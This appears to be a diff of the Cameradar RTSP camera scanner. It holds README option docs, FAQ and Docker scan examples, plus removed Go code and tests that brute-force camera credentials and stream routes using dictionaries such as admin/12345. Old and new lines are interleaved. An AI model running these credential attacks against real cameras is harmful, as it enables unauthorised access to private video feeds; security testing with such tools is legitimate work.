### `SCANNER` / `--scanner`
|
||||
|
||||
### `CAMERADAR_SPEED`
|
||||
This optional variable sets the discovery backend.
|
||||
|
||||
This optional variable allows you to set custom nmap discovery presets to improve speed or accuracy. It's recommended to lower it if you are attempting to scan an unstable and slow network, or to increase it if on a very performant and reliable network. See [this for more info on the nmap timing templates](https://nmap.org/book/man-performance.html).
|
||||
* `nmap` includes service discovery and is generally more reliable when you want
|
||||
to specifically identify RTSP services.
|
||||
* `masscan` is generally more efficient for large-scale discovery, but it does
|
||||
not identify services and therefore can be less specific for RTSP.
|
||||
|
||||
Supported values: `nmap`, `masscan`
|
||||
|
||||
Default value: `nmap`
|
||||
|
||||
### `SCAN_SPEED` / `--scan-speed` / `-s`
|
||||
|
||||
This optional variable sets nmap discovery presets for speed or accuracy.
|
||||
Lower it on slow networks and raise it on fast networks.
|
||||
See [nmap timing templates](https://nmap.org/book/man-performance.html).
|
||||
|
||||
This option is ignored when `--scanner masscan` is used.
|
||||
|
||||
Default value: `4`
|
||||
|
||||
### `CAMERADAR_TIMEOUT`
|
||||
### `SKIP_SCAN` / `--skip-scan`
|
||||
|
||||
This optional variable allows you to set custom timeout value in miliseconds after which an attack attempt without an answer should give up. It's recommended to increase it when attempting to scan unstable and slow networks or to decrease it on very performant and reliable networks.
|
||||
This optional flag skips network discovery and assumes every target and port
|
||||
pair is an RTSP stream.
|
||||
|
||||
Default value: `2000`
|
||||
Use it when you already know the RTSP endpoints or when discovery is blocked.
|
||||
For best results, specify only RTSP ports.
|
||||
|
||||
### `CAMERADAR_LOGGING`
|
||||
Default value: `false`
|
||||
|
||||
This optional variable allows you to enable a more verbose output to have more information about what is going on.
|
||||
### `ATTACK_INTERVAL` / `--attack-interval` / `-I`
|
||||
|
||||
It will output nmap results, cURL requests, etc.
|
||||
This optional variable sets a delay between attacks.
|
||||
Increase it for networks that may block brute-force attempts.
|
||||
Default: no delay.
|
||||
|
||||
Default value: `0ms`
|
||||
|
||||
### `TIMEOUT` / `--timeout` / `-T`
|
||||
|
||||
This optional variable sets the timeout for requests sent to the cameras.
|
||||
Increase it for slow networks and decrease it for fast networks.
|
||||
|
||||
Default value: `2000ms`
|
||||
|
||||
### `DEBUG` / `--debug` / `-d`
|
||||
|
||||
This optional variable enables more verbose output.
|
||||
|
||||
It outputs discovery results (`nmap` or `masscan`), cURL requests, and more.
|
||||
|
||||
Default: `false`
|
||||
|
||||
## Contribution
|
||||
### `UI` / `--ui`
|
||||
|
||||
### Build
|
||||
This option selects the UI mode.
|
||||
|
||||
#### Docker build
|
||||
* `auto` selects `tui` if your terminal is interactive, `plain` otherwise
|
||||
* `tui` shows a fullscreen interface with a progress bar and shows the results in a table
|
||||
* `plain` logs the steps taken by cameradar as plain text and is meant to be used by non-interactive terminals
|
||||
|
||||
To build the docker image, simply run `docker build -t . cameradar` in the root of the project.
|
||||
Supported values: `auto`, `tui`, `plain`
|
||||
|
||||
Your image will be called `cameradar` and NOT `ullaakut/cameradar`.
|
||||
Default: `auto`
|
||||
|
||||
#### Go build
|
||||
### `OUTPUT` / `--output`
|
||||
|
||||
To build the project without docker:
|
||||
This optional variable writes an M3U playlist of the discovered streams to the given file path.
|
||||
|
||||
1. Install dep
|
||||
* OSX: `brew install dep` and `brew upgrade dep`
|
||||
* Others: Download the release package for your OS [here](https://github.com/golang/dep/releases)
|
||||
2. `dep ensure`
|
||||
3. `go build` to build the library
|
||||
4. `cd cameradar && go build` to build the binary
|
||||
Example: `/tmp/cameradar.m3u`
|
||||
|
||||
The cameradar binary is now in the root of the directory.
|
||||
## Build and contribute
|
||||
|
||||
See [the contribution document](/CONTRIBUTING.md) to get started.
|
||||
### Docker build
|
||||
|
||||
## Frequently Asked Questions
|
||||
Run the following command in the repository root:
|
||||
|
||||
`docker build . -t cameradar`
|
||||
|
||||
The resulting image is named `cameradar`.
|
||||
|
||||
### Go build
|
||||
|
||||
1. `go install github.com/Ullaakut/cameradar/v6/cmd/cameradar@latest`
|
||||
|
||||
The `cameradar` binary is now in `$GOPATH/bin/cameradar`.
|
||||
|
||||
## Frequently asked questions
|
||||
|
||||
> Cameradar does not detect any camera!
|
||||
|
||||
That means that either your cameras are not streaming in RTSP or that they are not on the target you are scanning. In most cases, CCTV cameras will be on a private subnetwork, isolated from the internet. Use the `-t` option to specify your target.
|
||||
This usually means the cameras are not streaming over RTSP.
|
||||
It can also mean the targets are not in your scan range.
|
||||
CCTV cameras are often on private subnets.
|
||||
Use `-t` to set the correct targets.
|
||||
If you still see no results, open an issue with device details.
|
||||
|
||||
> Cameradar detects my cameras, but does not manage to access them at all!
|
||||
> Cameradar detects my cameras, but does not manage to access them!
|
||||
|
||||
Maybe your cameras have been configured and the credentials / URL have been changed. Cameradar only guesses using default constructor values if a custom dictionary is not provided. You can use your own dictionaries in which you just have to add your credentials and RTSP routes. To do that, see how the [configuration](#configuration) works. Also, maybe your camera's credentials are not yet known, in which case if you find them it would be very nice to add them to the Cameradar dictionaries to help other people in the future.
|
||||
The camera configuration may have changed, so defaults do not match.
|
||||
Cameradar uses defaults unless you provide custom dictionaries.
|
||||
Add your credentials and routes, then follow the [configuration](#configuration) section.
|
||||
|
||||
> What happened to the C++ version?
|
||||
|
||||
You can still find it under the 1.1.4 tag on this repo, however it was less performant and stable than the current version written in Golang.
|
||||
The 1.1.4 tag contains the legacy C++ implementation.
|
||||
It is slower and less stable than the Go version, so it is not recommended to use.
|
||||
|
||||
> How to use the Cameradar library for my own project?
|
||||
> I want to scan my local network or my own machine, and it does not work! What's going on?
|
||||
|
||||
See the example in `/cameradar`. You just need to run `go get github.com/Ullaakut/cameradar` and to use the `cmrdr` package in your code. You can find the documentation on [godoc](https://godoc.org/github.com/Ullaakut/cameradar).
|
||||
Use `--net=host` when running the Docker image, or use the installed binary.
|
||||
|
||||
> I want to scan my own localhost for some reason and it does not work! What's going on?
|
||||
> I don't have a camera, but I'd like to try Cameradar!
|
||||
|
||||
Use the `--net=host` flag when launching the cameradar image, or use the binary by running `go run cameradar/cameradar.go` or [installing it](#installing-the-binary)
|
||||
Run the following container, then run Cameradar against it:
|
||||
|
||||
> I don't see a colored output :(
|
||||
`docker run -p 8554:8554 -e RTSP_USERNAME=admin -e RTSP_PASSWORD=12345 -e RTSP_PORT=8554 ullaakut/rtspatt`
|
||||
|
||||
You forgot the `-t` flag before `ullaakut/cameradar` in your command-line. This tells docker to allocate a pseudo-tty for cameradar, which makes it able to use colors.
|
||||
Cameradar should discover the `admin` / `12345` credentials.
|
||||
You can try other default credentials listed in the dictionaries.
|
||||
|
||||
> I don't have a camera but I'd like to try Cameradar!
|
||||
> What authentication types does Cameradar support?
|
||||
|
||||
Simply run `docker run -p 8554:8554 -e RTSP_USERNAME=admin -e RTSP_PASSWORD=12345 -e RTSP_PORT=8554 ullaakut/rtspatt` and then run cameradar and it should guess that the username is admin and the password is 12345. You can try this with any default constructor credentials (they can be found [here](dictionaries/credentials.json))
|
||||
Cameradar supports both basic and digest authentication.
|
||||
|
||||
## Examples
|
||||
|
||||
> Running cameradar on your own machine to scan for default ports
|
||||
|
||||
`docker run --net=host -t ullaakut/cameradar -t localhost`
|
||||
`docker run --rm -t --net=host ullaakut/cameradar --targets localhost`
|
||||
|
||||
> Running cameradar with an input file, logs enabled on port 8554
|
||||
|
||||
`docker run -v /tmp:/tmp --net=host -t ullaakut/cameradar -t /tmp/test.txt -p 8554 -l`
|
||||
`docker run --rm -t --net=host -v /tmp:/tmp ullaakut/cameradar --targets /tmp/test.txt --ports 8554`
|
||||
|
||||
> Running cameradar on a subnetwork with custom dictionaries, on ports 554, 5554 and 8554
|
||||
|
||||
`docker run --rm -t --net=host -v /tmp:/tmp ullaakut/cameradar --targets 192.168.0.0/24 --custom-credentials "/tmp/dictionaries/credentials.json" --custom-routes "/tmp/dictionaries/routes" --ports 554,5554,8554`
|
||||
|
||||
> Running cameradar with masscan discovery
|
||||
|
||||
`docker run --rm -t --net=host ullaakut/cameradar --scanner masscan --targets 192.168.0.0/24 --ports 554,8554`
|
||||
|
||||
## License
|
||||
|
||||
Copyright 2017 Ullaakut
|
||||
Copyright 2026 Ullaakut
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
|
||||
DEALINGS IN THE SOFTWARE.
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
|
||||
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
||||
|
||||
@@ -1,283 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"time"
|
||||
|
||||
curl "github.com/andelf/go-curl"
|
||||
"github.com/pkg/errors"
|
||||
v "gopkg.in/go-playground/validator.v9"
|
||||
)
|
||||
|
||||
// HTTP responses
|
||||
const (
|
||||
httpOK = 200
|
||||
httpUnauthorized = 401
|
||||
httpForbidden = 403
|
||||
httpNotFound = 404
|
||||
)
|
||||
|
||||
// CURL RTSP request types
|
||||
const (
|
||||
rtspDescribe = 2
|
||||
rtspSetup = 4
|
||||
)
|
||||
|
||||
// HACK: See https://stackoverflow.com/questions/3572397/lib-curl-in-c-disable-printing
|
||||
func doNotWrite([]uint8, interface{}) bool {
|
||||
return true
|
||||
}
|
||||
|
||||
func routeAttack(c Curler, stream Stream, route string, timeout time.Duration, enableLogs bool) bool {
|
||||
attackURL := fmt.Sprintf(
|
||||
"rtsp://%s:%s@%s:%d/%s",
|
||||
stream.Username,
|
||||
stream.Password,
|
||||
stream.Address,
|
||||
stream.Port,
|
||||
route,
|
||||
)
|
||||
|
||||
if enableLogs {
|
||||
// Debug logs when logs are enabled
|
||||
c.Setopt(curl.OPT_VERBOSE, 1)
|
||||
} else {
|
||||
// Do not write sdp in stdout
|
||||
c.Setopt(curl.OPT_WRITEFUNCTION, doNotWrite)
|
||||
}
|
||||
|
||||
// Do not use signals (would break multithreading)
|
||||
c.Setopt(curl.OPT_NOSIGNAL, 1)
|
||||
// Do not send a body in the describe request
|
||||
c.Setopt(curl.OPT_NOBODY, 1)
|
||||
// Send a request to the URL of the stream we want to attack
|
||||
c.Setopt(curl.OPT_URL, attackURL)
|
||||
// Set the RTSP STREAM URI as the stream URL
|
||||
c.Setopt(curl.OPT_RTSP_STREAM_URI, attackURL)
|
||||
// 2 is CURL_RTSPREQ_DESCRIBE
|
||||
c.Setopt(curl.OPT_RTSP_REQUEST, rtspDescribe)
|
||||
// Set custom timeout
|
||||
c.Setopt(curl.OPT_TIMEOUT_MS, int(timeout/time.Millisecond))
|
||||
|
||||
// Perform the request
|
||||
err := c.Perform()
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
|
||||
// Get return code for the request
|
||||
rc, err := c.Getinfo(curl.INFO_RESPONSE_CODE)
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
|
||||
// If it's a 401 or 403, it means that the credentials are wrong but the route might be okay
|
||||
// If it's a 200, the stream is accessed successfully
|
||||
if rc == httpOK || rc == httpUnauthorized || rc == httpForbidden {
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func credAttack(c Curler, stream Stream, username string, password string, timeout time.Duration, enableLogs bool) bool {
|
||||
attackURL := fmt.Sprintf(
|
||||
"rtsp://%s:%s@%s:%d/%s",
|
||||
username,
|
||||
password,
|
||||
stream.Address,
|
||||
stream.Port,
|
||||
stream.Route,
|
||||
)
|
||||
|
||||
if enableLogs {
|
||||
// Debug logs when logs are enabled
|
||||
c.Setopt(curl.OPT_VERBOSE, 1)
|
||||
} else {
|
||||
// Do not write sdp in stdout
|
||||
c.Setopt(curl.OPT_WRITEFUNCTION, doNotWrite)
|
||||
}
|
||||
|
||||
// Do not use signals (would break multithreading)
|
||||
c.Setopt(curl.OPT_NOSIGNAL, 1)
|
||||
// Do not send a body in the describe request
|
||||
c.Setopt(curl.OPT_NOBODY, 1)
|
||||
// Send a request to the URL of the stream we want to attack
|
||||
c.Setopt(curl.OPT_URL, attackURL)
|
||||
// Set the RTSP STREAM URI as the stream URL
|
||||
c.Setopt(curl.OPT_RTSP_STREAM_URI, attackURL)
|
||||
// 2 is CURL_RTSPREQ_DESCRIBE
|
||||
c.Setopt(curl.OPT_RTSP_REQUEST, 2)
|
||||
// Set custom timeout
|
||||
c.Setopt(curl.OPT_TIMEOUT_MS, int(timeout/time.Millisecond))
|
||||
|
||||
// Perform the request
|
||||
err := c.Perform()
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
|
||||
// Get return code for the request
|
||||
rc, err := c.Getinfo(curl.INFO_RESPONSE_CODE)
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
|
||||
// If it's a 404, it means that the route is incorrect but the credentials might be okay
|
||||
// If it's a 200, the stream is accessed successfully
|
||||
if rc == httpOK || rc == httpNotFound {
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func validateStream(c Curler, stream Stream, timeout time.Duration, enableLogs bool) bool {
|
||||
attackURL := fmt.Sprintf(
|
||||
"rtsp://%s:%s@%s:%d/%s",
|
||||
stream.Username,
|
||||
stream.Password,
|
||||
stream.Address,
|
||||
stream.Port,
|
||||
stream.Route,
|
||||
)
|
||||
|
||||
if enableLogs {
|
||||
// Debug logs when logs are enabled
|
||||
c.Setopt(curl.OPT_VERBOSE, 1)
|
||||
} else {
|
||||
// Do not write sdp in stdout
|
||||
c.Setopt(curl.OPT_WRITEFUNCTION, doNotWrite)
|
||||
}
|
||||
|
||||
// Do not use signals (would break multithreading)
|
||||
c.Setopt(curl.OPT_NOSIGNAL, 1)
|
||||
// Do not send a body in the describe request
|
||||
c.Setopt(curl.OPT_NOBODY, 1)
|
||||
// Send a request to the URL of the stream we want to attack
|
||||
c.Setopt(curl.OPT_URL, attackURL)
|
||||
// Set the RTSP STREAM URI as the stream URL
|
||||
c.Setopt(curl.OPT_RTSP_STREAM_URI, attackURL)
|
||||
// 2 is CURL_RTSPREQ_SETUP
|
||||
c.Setopt(curl.OPT_RTSP_REQUEST, rtspSetup)
|
||||
// Set custom timeout
|
||||
c.Setopt(curl.OPT_TIMEOUT_MS, int(timeout/time.Millisecond))
|
||||
|
||||
c.Setopt(curl.OPT_RTSP_TRANSPORT, "RTP/AVP;unicast;client_port=33332-33333")
|
||||
|
||||
// Perform the request
|
||||
err := c.Perform()
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
|
||||
// Get return code for the request
|
||||
rc, err := c.Getinfo(curl.INFO_RESPONSE_CODE)
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
|
||||
// If it's a 200, the stream is accessed successfully
|
||||
if rc == httpOK {
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// ValidateStreams tries to setup the stream to validate whether or not it is available
|
||||
func ValidateStreams(c Curler, targets []Stream, timeout time.Duration, log bool) ([]Stream, error) {
|
||||
for idx, target := range targets {
|
||||
targets[idx].Available = validateStream(c, target, timeout, log)
|
||||
}
|
||||
|
||||
return targets, nil
|
||||
}
|
||||
|
||||
func attackCameraCredentials(c Curler, target Stream, credentials Credentials, resultsChan chan<- Stream, timeout time.Duration, log bool) {
|
||||
for _, username := range credentials.Usernames {
|
||||
for _, password := range credentials.Passwords {
|
||||
ok := credAttack(c.Duphandle(), target, username, password, timeout, log)
|
||||
if ok {
|
||||
target.CredentialsFound = true
|
||||
target.Username = username
|
||||
target.Password = password
|
||||
resultsChan <- target
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
target.CredentialsFound = false
|
||||
resultsChan <- target
|
||||
}
|
||||
|
||||
func attackCameraRoute(c Curler, target Stream, routes Routes, resultsChan chan<- Stream, timeout time.Duration, log bool) {
|
||||
for _, route := range routes {
|
||||
ok := routeAttack(c.Duphandle(), target, route, timeout, log)
|
||||
if ok {
|
||||
target.RouteFound = true
|
||||
target.Route = route
|
||||
resultsChan <- target
|
||||
return
|
||||
}
|
||||
}
|
||||
target.RouteFound = false
|
||||
resultsChan <- target
|
||||
}
|
||||
|
||||
// AttackCredentials attempts to guess the provided targets' credentials using the given
|
||||
// dictionary or the default dictionary if none was provided by the user.
|
||||
func AttackCredentials(c Curler, targets []Stream, credentials Credentials, timeout time.Duration, log bool) ([]Stream, error) {
|
||||
attacks := make(chan Stream)
|
||||
defer close(attacks)
|
||||
|
||||
validate := v.New()
|
||||
for _, target := range targets {
|
||||
err := validate.Struct(target)
|
||||
if err != nil {
|
||||
return targets, errors.Wrap(err, "invalid targets")
|
||||
}
|
||||
|
||||
go attackCameraCredentials(c, target, credentials, attacks, timeout, log)
|
||||
}
|
||||
|
||||
attackResults := []Stream{}
|
||||
for range targets {
|
||||
attackResults = append(attackResults, <-attacks)
|
||||
}
|
||||
|
||||
for _, result := range attackResults {
|
||||
if result.CredentialsFound {
|
||||
targets = replace(targets, result)
|
||||
}
|
||||
}
|
||||
|
||||
return targets, nil
|
||||
}
|
||||
|
||||
// AttackRoute attempts to guess the provided targets' streaming routes using the given
|
||||
// dictionary or the default dictionary if none was provided by the user.
|
||||
func AttackRoute(c Curler, targets []Stream, routes Routes, timeout time.Duration, log bool) ([]Stream, error) {
|
||||
attacks := make(chan Stream)
|
||||
defer close(attacks)
|
||||
|
||||
validate := v.New()
|
||||
for _, target := range targets {
|
||||
err := validate.Struct(target)
|
||||
if err != nil {
|
||||
return targets, errors.Wrap(err, "invalid targets")
|
||||
}
|
||||
|
||||
go attackCameraRoute(c, target, routes, attacks, timeout, log)
|
||||
}
|
||||
|
||||
attackResults := []Stream{}
|
||||
for range targets {
|
||||
attackResults = append(attackResults, <-attacks)
|
||||
}
|
||||
|
||||
for _, result := range attackResults {
|
||||
if result.RouteFound {
|
||||
targets = replace(targets, result)
|
||||
}
|
||||
}
|
||||
|
||||
return targets, nil
|
||||
}
|
||||
-521
@@ -1,521 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"os"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
curl "github.com/andelf/go-curl"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/mock"
|
||||
)
|
||||
|
||||
type CurlerMock struct {
|
||||
mock.Mock
|
||||
}
|
||||
|
||||
func (m *CurlerMock) Setopt(opt int, param interface{}) error {
|
||||
args := m.Called(opt, param)
|
||||
return args.Error(0)
|
||||
}
|
||||
|
||||
func (m *CurlerMock) Perform() error {
|
||||
args := m.Called()
|
||||
return args.Error(0)
|
||||
}
|
||||
|
||||
func (m *CurlerMock) Getinfo(info curl.CurlInfo) (interface{}, error) {
|
||||
args := m.Called(info)
|
||||
return args.Int(0), args.Error(1)
|
||||
}
|
||||
|
||||
func (m *CurlerMock) Duphandle() Curler {
|
||||
return m
|
||||
}
|
||||
|
||||
func TestAttackCredentials(t *testing.T) {
|
||||
validStream1 := Stream{
|
||||
Device: "fakeDevice",
|
||||
Address: "fakeAddress",
|
||||
Port: 1337,
|
||||
}
|
||||
|
||||
validStream2 := Stream{
|
||||
Device: "fakeDevice",
|
||||
Address: "differentFakeAddress",
|
||||
Port: 1337,
|
||||
}
|
||||
|
||||
invalidStream := Stream{
|
||||
Device: "InvalidDevice",
|
||||
}
|
||||
|
||||
fakeTargets := []Stream{validStream1, validStream2}
|
||||
invalidTargets := []Stream{invalidStream}
|
||||
fakeCredentials := Credentials{
|
||||
Usernames: []string{"admin", "root"},
|
||||
Passwords: []string{"12345", "root"},
|
||||
}
|
||||
|
||||
testCases := []struct {
|
||||
targets []Stream
|
||||
credentials Credentials
|
||||
timeout time.Duration
|
||||
log bool
|
||||
|
||||
status int
|
||||
|
||||
performErr error
|
||||
getInfoErr error
|
||||
invalidTargets bool
|
||||
|
||||
expectedStreams []Stream
|
||||
expectedErrMsg string
|
||||
}{
|
||||
// Credentials found
|
||||
{
|
||||
targets: fakeTargets,
|
||||
credentials: fakeCredentials,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
status: 404,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Camera accessed
|
||||
{
|
||||
targets: fakeTargets,
|
||||
credentials: fakeCredentials,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
status: 200,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Invalid targets
|
||||
{
|
||||
targets: invalidTargets,
|
||||
credentials: fakeCredentials,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
invalidTargets: true,
|
||||
|
||||
expectedErrMsg: "invalid targets",
|
||||
expectedStreams: invalidTargets,
|
||||
},
|
||||
// curl perform fails
|
||||
{
|
||||
targets: fakeTargets,
|
||||
credentials: fakeCredentials,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
performErr: errors.New("dummy error"),
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// curl getinfo fails
|
||||
{
|
||||
targets: fakeTargets,
|
||||
credentials: fakeCredentials,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
getInfoErr: errors.New("dummy error"),
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Logging disabled
|
||||
{
|
||||
targets: fakeTargets,
|
||||
credentials: fakeCredentials,
|
||||
timeout: 1 * time.Millisecond,
|
||||
log: false,
|
||||
|
||||
status: 403,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Logging enabled
|
||||
{
|
||||
targets: fakeTargets,
|
||||
credentials: fakeCredentials,
|
||||
timeout: 1 * time.Millisecond,
|
||||
log: true,
|
||||
|
||||
status: 403,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
}
|
||||
for i, test := range testCases {
|
||||
curlerMock := &CurlerMock{}
|
||||
|
||||
if !test.invalidTargets {
|
||||
curlerMock.On("Setopt", mock.Anything, mock.Anything).Return(nil)
|
||||
curlerMock.On("Perform").Return(test.performErr)
|
||||
if test.performErr == nil {
|
||||
curlerMock.On("Getinfo", mock.Anything).Return(test.status, test.getInfoErr)
|
||||
}
|
||||
}
|
||||
|
||||
results, err := AttackCredentials(curlerMock, test.targets, test.credentials, test.timeout, test.log)
|
||||
|
||||
if len(test.expectedErrMsg) > 0 {
|
||||
if err == nil {
|
||||
fmt.Printf("unexpected success in AttackCredentials test, iteration %d. expected error: %s\n", i, test.expectedErrMsg)
|
||||
os.Exit(1)
|
||||
}
|
||||
assert.Contains(t, err.Error(), test.expectedErrMsg, "wrong error message")
|
||||
} else {
|
||||
if err != nil {
|
||||
fmt.Printf("unexpected error in AttackCredentials test, iteration %d: %v\n", i, err)
|
||||
os.Exit(1)
|
||||
}
|
||||
for _, stream := range test.expectedStreams {
|
||||
foundStream := false
|
||||
for _, result := range results {
|
||||
if result.Address == stream.Address && result.Device == stream.Device && result.Port == stream.Port {
|
||||
foundStream = true
|
||||
}
|
||||
}
|
||||
assert.Equal(t, true, foundStream, "wrong streams parsed")
|
||||
}
|
||||
}
|
||||
assert.Equal(t, len(test.expectedStreams), len(results), "wrong streams parsed")
|
||||
curlerMock.AssertExpectations(t)
|
||||
}
|
||||
}
|
||||
|
||||
func TestAttackRoute(t *testing.T) {
|
||||
validStream1 := Stream{
|
||||
Device: "fakeDevice",
|
||||
Address: "fakeAddress",
|
||||
Port: 1337,
|
||||
}
|
||||
|
||||
validStream2 := Stream{
|
||||
Device: "fakeDevice",
|
||||
Address: "differentFakeAddress",
|
||||
Port: 1337,
|
||||
}
|
||||
|
||||
invalidStream := Stream{
|
||||
Device: "InvalidDevice",
|
||||
}
|
||||
|
||||
fakeTargets := []Stream{validStream1, validStream2}
|
||||
fakeRoutes := Routes{"live.sdp", "media.amp"}
|
||||
invalidTargets := []Stream{invalidStream}
|
||||
|
||||
testCases := []struct {
|
||||
targets []Stream
|
||||
routes Routes
|
||||
timeout time.Duration
|
||||
log bool
|
||||
|
||||
status int
|
||||
|
||||
performErr error
|
||||
getInfoErr error
|
||||
invalidTargets bool
|
||||
|
||||
expectedStreams []Stream
|
||||
expectedErrMsg string
|
||||
}{
|
||||
// Route found
|
||||
{
|
||||
targets: fakeTargets,
|
||||
routes: fakeRoutes,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
status: 403,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Route found
|
||||
{
|
||||
targets: fakeTargets,
|
||||
routes: fakeRoutes,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
status: 401,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Camera accessed
|
||||
{
|
||||
targets: fakeTargets,
|
||||
routes: fakeRoutes,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
status: 200,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Invalid targets
|
||||
{
|
||||
targets: invalidTargets,
|
||||
routes: fakeRoutes,
|
||||
timeout: 1 * time.Millisecond,
|
||||
invalidTargets: true,
|
||||
|
||||
expectedErrMsg: "invalid targets",
|
||||
expectedStreams: invalidTargets,
|
||||
},
|
||||
// curl perform fails
|
||||
{
|
||||
targets: fakeTargets,
|
||||
routes: fakeRoutes,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
performErr: errors.New("dummy error"),
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// curl getinfo fails
|
||||
{
|
||||
targets: fakeTargets,
|
||||
routes: fakeRoutes,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
getInfoErr: errors.New("dummy error"),
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Logs disabled
|
||||
{
|
||||
targets: fakeTargets,
|
||||
routes: fakeRoutes,
|
||||
timeout: 1 * time.Millisecond,
|
||||
log: false,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Logs enabled
|
||||
{
|
||||
targets: fakeTargets,
|
||||
routes: fakeRoutes,
|
||||
timeout: 1 * time.Millisecond,
|
||||
log: true,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
}
|
||||
|
||||
for i, test := range testCases {
|
||||
curlerMock := &CurlerMock{}
|
||||
|
||||
if !test.invalidTargets {
|
||||
curlerMock.On("Setopt", mock.Anything, mock.Anything).Return(nil)
|
||||
curlerMock.On("Perform").Return(test.performErr)
|
||||
if test.performErr == nil {
|
||||
curlerMock.On("Getinfo", mock.Anything).Return(test.status, test.getInfoErr)
|
||||
}
|
||||
}
|
||||
|
||||
results, err := AttackRoute(curlerMock, test.targets, test.routes, test.timeout, test.log)
|
||||
|
||||
if len(test.expectedErrMsg) > 0 {
|
||||
if err == nil {
|
||||
fmt.Printf("unexpected success in AttackRoute test, iteration %d. expected error: %s\n", i, test.expectedErrMsg)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
assert.Contains(t, err.Error(), test.expectedErrMsg, "wrong error message")
|
||||
} else {
|
||||
if err != nil {
|
||||
fmt.Printf("unexpected error in AttackRoute test, iteration %d: %v\n", i, err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
for _, stream := range test.expectedStreams {
|
||||
foundStream := false
|
||||
for _, result := range results {
|
||||
if result.Address == stream.Address && result.Device == stream.Device && result.Port == stream.Port {
|
||||
foundStream = true
|
||||
}
|
||||
}
|
||||
|
||||
assert.Equal(t, true, foundStream, "wrong streams parsed")
|
||||
}
|
||||
}
|
||||
|
||||
assert.Equal(t, len(test.expectedStreams), len(results), "wrong streams parsed")
|
||||
|
||||
curlerMock.AssertExpectations(t)
|
||||
}
|
||||
}
|
||||
|
||||
func TestValidateStreams(t *testing.T) {
|
||||
validStream1 := Stream{
|
||||
Device: "fakeDevice",
|
||||
Address: "fakeAddress",
|
||||
Port: 1337,
|
||||
Available: true,
|
||||
}
|
||||
|
||||
validStream2 := Stream{
|
||||
Device: "fakeDevice",
|
||||
Address: "differentFakeAddress",
|
||||
